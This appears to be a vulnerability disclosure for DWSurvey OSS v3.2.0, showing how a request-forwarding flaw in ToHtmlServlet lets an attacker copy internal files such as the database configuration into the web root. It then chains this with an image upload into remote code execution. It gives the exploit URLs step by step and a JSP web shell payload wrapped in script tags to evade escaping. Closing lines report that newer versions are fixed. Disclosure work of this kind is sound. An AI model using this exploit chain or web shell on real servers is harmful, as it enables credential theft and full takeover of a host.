In the latest version of dwsurvey-oss-v3.2.0, there is a requestdispatcher.forward Request forwarding. Since the same request object and response object are shared before and after forwarding, the forwarded response will be output to the byte array buffer in memory, and finally the file is written in the printstream function. Because Requestdispatcher.forward is a jump between internal resources, you can request internal sensitive files on the server, such as: / WEB-INF / web.xml, causing arbitrary file vulnerabilities by writing and re accessing; In addition, it can also cause rce in combination with background file upload.

Request forwarding exists in the server method in the com/key/common/utils/ToHtmlServlet.java file

Due to the existence of ByteArrayOutputStream, the forwarded response is saved in the byte array buffer in memory
The flushDo function was passed in

Here, it is converted into a string and assigned to the document variable

Pass in printStream function

Splice savepath and filename as the target file, and finally write the response content to the file. The savepath and filename variables can also be controlled from the above

payload：
http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.txt&url=/WEB-INF/classes/conf/application.properties
The 1.txt file will be written in the web root directory and then accessed http://localhost:8888/diaowen/1.txt
Successfully read database configuration file:

You can also find a file upload place in the background to create rce, create a new questionnaire - > Advanced Editor in the background, and upload a picture horse and burpsuite to capture the package

Visit http://localhost:8888/diaowen/toHtml?filePath=/&fileName=1.jsp&url=/ueditor/jsp/upload/image/20210815/1629018633885086990.png ，the JSP file will be generated in the web root directory
Due to the Jsoup. parse method resolution to escape of JSP tags, when tested, when using the '<script> </script>' tag to package payload, can successfully bypass escaped

So the uploaded image file content is:
<script><%Runtime.getRuntime().exec(request.getParameter("i"));%></script>
Visit http://localhost:8888/diaowen/1.jsp?i=calc, successfully rce:

版本已经更新，请检查是否还存在

新版本不存在该问题